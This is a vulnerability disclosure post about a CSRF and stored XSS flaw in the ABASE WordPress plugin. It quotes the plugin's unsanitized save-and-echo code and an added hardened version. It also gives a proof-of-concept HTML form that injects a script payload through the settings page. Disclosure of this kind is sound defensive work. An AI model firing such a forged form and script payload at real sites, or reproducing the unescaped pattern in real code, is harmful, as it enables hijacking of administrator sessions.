30 Jan

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in ABASE

We recently found that the ABASE plugin contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s settings page, /wp-admin/options-general.php?page=abase.

The CSRF portion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings.

For the XSS issue, in the file /abase_plugin_options.php starting at line 31 in version 2.6, settings are saved and there is no sanitization done. For example, the File Upload Directory setting is saved with this code:

$dbfiles = $_POST['bus311mtd_dbfiles'];
update_option('bus311mtd_dbfiles', $dbfiles);

When the values are output on the page through the same file, they are not escaped. For example, the File Upload Directory setting is echoed on line 246:

<td colspan=3>http://<?php echo $_SERVER['HTTP_HOST']; ?>/<input type="text" name="bus311mtd_dbfiles<?php echo $dbn;?>" value="<?php echo $dfiles; ?>" <?php if($dfiles==''){echo 'placeholder="'.$bus311mtd_default_file_upload_directory.'"';};?> size="20">/&lt;table_name&gt;/&lt;column_name&gt;/&lt;primary_index&gt;/&lt;file_name&gt;</td>
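As an added illustration (not the plugin’s own code), here is the same save-and-echo flow for the bus311mtd_dbfiles setting with the missing controls in place: a capability check, a nonce generated with wp_nonce_field() and verified with check_admin_referer(), sanitization of the value on the way in, and esc_attr() on the way out. The nonce action and field names (abase_save_settings, abase_nonce) and the function names are assumptions.

```php
<?php
// Added example, not the plugin's code. Nonce action/field names are assumed.

function abase_example_save_settings() {
    // 1. Only users allowed to manage options may change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF: the request must carry a nonce issued to this user for this
    //    action. check_admin_referer() stops execution if it is missing/invalid,
    //    so a form submitted from a third-party page never reaches the save.
    check_admin_referer( 'abase_save_settings', 'abase_nonce' );

    // 3. Input sanitization: strip tags and control characters before storing,
    //    so a value such as '"><script>...' is never persisted as-is.
    $dbfiles = isset( $_POST['bus311mtd_dbfiles'] )
        ? sanitize_text_field( wp_unslash( $_POST['bus311mtd_dbfiles'] ) )
        : '';
    update_option( 'bus311mtd_dbfiles', $dbfiles );
}

function abase_example_render_settings() {
    $dfiles = get_option( 'bus311mtd_dbfiles', '' );
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'options-general.php?page=abase' ) ); ?>">
        <?php
        // Emits the hidden nonce field that check_admin_referer() verifies.
        wp_nonce_field( 'abase_save_settings', 'abase_nonce' );
        ?>
        <!-- 4. Output escaping: esc_attr() converts " to &quot; so a stored value
             cannot close the attribute and inject markup into the page. -->
        http://<?php echo esc_html( $_SERVER['HTTP_HOST'] ); ?>/
        <input type="text" name="bus311mtd_dbfiles"
               value="<?php echo esc_attr( $dfiles ); ?>" size="20">
        <input type="submit" value="Save">
    </form>
    <?php
}

// Save only on a POST that carries the field; the checks above gate it.
if ( 'POST' === $_SERVER['REQUEST_METHOD'] && isset( $_POST['bus311mtd_dbfiles'] ) ) {
    abase_example_save_settings();
}
abase_example_render_settings();
```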

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/options-general.php?page=abase, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=abase" method="POST">
<input type="hidden" name="bus311mtd_hidden" value="Y" />
<input type="hidden" name="bus311mtd_show" value="1" />
<input type="hidden" name="bus311mtd_dbfiles" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

The plugin’s website is no longer accessible, so we couldn’t contact the plugin’s developer and we are notifying the Plugin Directory of our disclosure.

Timeline

  • January 30, 2017 – WordPress.org Plugin Directory notified.
  • January 30, 2017 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that the needed security checks have been implemented in the plugin. If you order two reviews you will receive a free lifetime subscription to our service.
